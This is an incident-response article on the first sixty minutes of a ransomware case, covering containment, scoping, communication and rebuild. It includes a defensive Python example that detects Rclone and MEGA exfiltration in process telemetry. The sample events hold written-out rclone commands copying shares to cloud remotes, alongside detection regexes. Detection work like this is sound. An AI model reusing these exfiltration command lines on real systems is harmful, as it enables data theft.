What we ask, do and document during the first sixty minutes of a ransomware incident — and why the next sixty hours depend almost entirely on how the first sixty went.
Tom Berghuis
Head of Incident Response
If you have ever sat in the first call of a ransomware incident, you know the temperature in the room. Six panicked people, a CEO who wants to know if 'the backups are okay', and a phone call to make to either a regulator or a law enforcement liaison — sometimes both. The next decisions ripple for weeks.
Minute 0–10: contain the bleeding, gently
The instinct is to pull the plug; the discipline is to isolate. Network-isolate, do not power off — volatile memory and live processes carry investigative gold. Get a second pair of eyes on the EDR before anyone touches a host.
Minute 10–30: scope
Identify which segments are affected, which credentials are likely compromised, and whether data has been staged for exfiltration. The presence of an Rclone or MEGA process is, in our caseload, the single most reliable predictor of double extortion.
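An added example, not part of the original post, of how the scoping check above can be run over process-creation telemetry: it flags Rclone and MEGA client processes by image name and, because Rclone is often found under a renamed binary, also by its `verb source remote:path` command syntax and its own flags, then rolls the hits up into the hosts, credentials and destinations the scoping call needs. The Sysmon-style events, hostnames, users, paths and remote names are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon Event ID 1 style process-creation events (simplified).
# Hostnames, users, paths and remote names are invented for this example.
EVENTS = [
    {"host": "FS01", "user": "CORP\\svc_backup", "image": r"C:\Windows\Temp\rclone.exe",
     "cmdline": r'rclone.exe copy "D:\Shares\Finance" mega:dump --transfers 32 -q'},
    {"host": "WS17", "user": "CORP\\jdoe", "image": r"C:\ProgramData\svchost.exe",
     "cmdline": r"svchost.exe sync D:\HR remote:exfil --config C:\ProgramData\r.conf"},
    {"host": "WS22", "user": "CORP\\asmith", "image": r"C:\Program Files\MEGAcmd\MEGAclient.exe",
     "cmdline": r"MEGAclient.exe put C:\Users\asmith\Documents\Q3"},
    {"host": "WS03", "user": "CORP\\bjones", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]

IMAGE_NAMES = re.compile(r"rclone|megasync|megacmd|megaclient", re.I)
# rclone's "<verb> <source> <remote>:<path>" syntax and its own flags survive a rename.
RCLONE_SYNTAX = re.compile(r"\b(copy|sync|move)\b.*\s[A-Za-z][\w-]+:\S*", re.I)
RCLONE_FLAGS = re.compile(r"--(transfers|config|multi-thread-streams|bwlimit|ignore-existing)\b", re.I)
# Remote name of two or more characters, so Windows drive letters (D:\...) are skipped.
REMOTE = re.compile(r"\s([A-Za-z][\w-]+):(\S*)")

@dataclass
class Finding:
    host: str
    user: str
    reason: str
    destination: str

def triage_exfil_tooling(events):
    """Return one Finding per event that looks like Rclone or MEGA client activity."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1]
        cmd = ev["cmdline"]
        reason = None
        if IMAGE_NAMES.search(image):
            reason = f"known exfil tool image: {image}"
        elif RCLONE_SYNTAX.search(cmd) or RCLONE_FLAGS.search(cmd):
            reason = f"rclone command syntax under unexpected image: {image}"
        if reason:
            m = REMOTE.search(cmd)
            findings.append(Finding(ev["host"], ev["user"], reason,
                                    f"{m.group(1)}:{m.group(2)}" if m else "n/a"))
    return findings

def scope_summary(findings):
    # Hosts, credentials and destinations to feed the scoping discussion.
    return {"hosts": sorted({f.host for f in findings}),
            "credentials": sorted({f.user for f in findings}),
            "destinations": sorted({f.destination for f in findings})}
```

The credential list is the starting point for rotation, not the end of it: any account that logged on to a flagged host should be treated as exposed as well.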
Minute 30–60: communicate
Internal: stand up an out-of-band channel; assume your primary email and chat are compromised. External: counsel, cyber-insurer, regulator (under GDPR, the 72-hour clock has already started). Law enforcement liaison is a parallel call, not a sequential one.
Hours 1–24: collection and parallel tracks
Forensic acquisition of representative endpoints, volatile-memory capture of the domain controllers, and log centralisation. In parallel: assessment of decryptable variants, restore feasibility, and (separately) the negotiation track if applicable.
Days 1–7: rebuild while investigating
The two streams must run together. Restoring into the same environment that was compromised buys you a second incident, often within a week. Identity rebuild, credential rotation, and a clean-network strategy are non-negotiable.